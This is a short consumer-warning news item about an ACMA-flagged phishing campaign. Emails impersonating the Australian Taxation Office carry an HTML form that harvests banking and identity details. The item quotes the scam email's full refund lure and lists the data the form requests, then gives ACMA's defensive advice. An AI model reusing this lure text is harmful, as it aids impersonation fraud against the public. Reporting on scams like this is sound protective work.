The Australian Communications and Media Authority is warning against the ‘financial institutions smart phish’ campaign, which can ‘dynamically adapt its content to request customer credentials for almost every financial institution currently operating in Australia.’
Affected emails are arriving in people’s inboxes with an attached HTML file, with the text of the email encouraging recipients to open up the file.
An example of the text in the email is as follows:
“After the last calculation of your fiscal activity, we have determined that you are eligible to receive a refund of $699.64
“In order to receive your tax refund, please follow next steps:
“Save the attached form on your PC and open it in a web browser (e.g. Chrome, Safari or Firefox). If you can't save the attached form, please use a different browser.
“Once opened, you will be provided with the steps to complete your tax refund application form.
“Complete the attached form accurately to avoid delays in processing your application.
“We will refund your tax within 30 days after you submit the form.
“Tax Refund Department
“Australian Taxation Office”.
The form presented dynamically changes to ask you about your credit card type and other personal information like driver’s license, Medicare card, passport number and other details - even your mother’s maiden name and pet’s name!
Clearly, the information requested by the scam is elaborate enough to help the scammers perpetuate further identity and account take-over fraud.
ACMA warns that ‘This ‘smart’ form can even identify incorrectly entered information, such as an invalid credit card number or too many/too few alpha or numeric characters. ‘Help’ fields also appear to assist data entry. All of these features help to make the form look legitimate.’
To avoid being scammed, ACMA advises the solution is ‘simple — never open forms attached to emails. No reputable organisation will ask you for information in this way.’
ACMA also advises to turn on two-factor authentication on accounts that offer it, with its ACMA’s Stay Smart Online site worth visiting ‘for further tips on how to avoid having your personal information exposed to a phishing campaign.’